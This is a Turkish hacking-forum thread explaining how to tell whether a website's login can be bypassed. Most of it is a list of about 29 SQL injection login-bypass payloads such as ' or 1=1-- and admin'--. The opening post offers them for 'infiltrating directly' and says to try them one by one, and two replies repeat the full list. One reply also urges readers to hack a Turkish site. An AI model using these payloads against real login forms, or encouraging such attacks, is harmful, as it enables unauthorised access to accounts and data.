Bir sitede login bypass oluğ olmadığını nasıl anlarız? (Anlatım)

TURKHACKER2009

Kıdemli Üye
20 Eyl 2021
2,539
692
24
Bir sitede login bypass olup olmadığını öğrenmek istiyorsanız açık tarama toolardan vesaire öğrenebilirsiniz fakat direk sızmak istiyorsanız kodlar bunlardır

'=' 'or'
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--

Bu koldarı eyer 1. sinden itibaren olmazsa üşenmeden denemeniz gerek eyer hayla olmadıysa güzel bir açık tarama programı ile deneyiniz onlar bu açığı bulup size gerekli koduda verecekerdir hayla olmadıysa sitede login bypass açığı yok demektir.... Bir şeyler kattıysam sizlere ne mutlu bana :)
 

Krypthon

Katılımcı Üye
21 Ağu 2021
796
754
Tien-Şan
Eline sağlık güzel konu fakat forumda bu konudan çokça var araştırıp eksik gördüğün konuları paylaşırsan daha yararlı olacaktır.
 
14 Tem 2021
128
49
Bir sitede login bypass olup olmadığını öğrenmek istiyorsanız açık tarama toolardan vesaire öğrenebilirsiniz fakat direk sızmak istiyorsanız kodlar bunlardır

'=' 'or'
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--

Bu koldarı eyer 1. sinden itibaren olmazsa üşenmeden denemeniz gerek eyer hayla olmadıysa güzel bir açık tarama programı ile deneyiniz onlar bu açığı bulup size gerekli koduda verecekerdir hayla olmadıysa sitede login bypass açığı yok demektir.... Bir şeyler kattıysam sizlere ne mutlu bana :)
Eline sağlık
 

TURKHACKER2009

Kıdemli Üye
20 Eyl 2021
2,539
692
24
Eline sağlık güzel konu fakat forumda bu konudan çokça var araştırıp eksik gördüğün konuları paylaşırsan daha yararlı olacaktır.
eline sağlık, tek tek uğraşmaya gerek yok, açtığım konuya bakabilirsiniz, iyi forumlar.
Sql İnjection | Burp Suite ile Admin Panel Bypass
Teşekkür ederim :)
 

Ratuzmanı

Üye
21 Kas 2021
72
10
Web, sosyal medya
Bir sitede login bypass olup olmadığını öğrenmek istiyorsanız açık tarama toolardan vesaire öğrenebilirsiniz fakat direk sızmak istiyorsanız kodlar bunlardır

'=' 'or'
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--

Bu koldarı eyer 1. sinden itibaren olmazsa üşenmeden denemeniz gerek eyer hayla olmadıysa güzel bir açık tarama programı ile deneyiniz onlar bu açığı bulup size gerekli koduda verecekerdir hayla olmadıysa sitede login bypass açığı yok demektir.... Bir şeyler kattıysam sizlere ne mutlu bana :)
Güzel konu ama dorklar yok ben acdim konu ya eklecem sende ekersin ve bence bir tr site hackleyin seni den gördü soylerse ne yapacaksin bunu la ilgili bir şey yaz bence
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.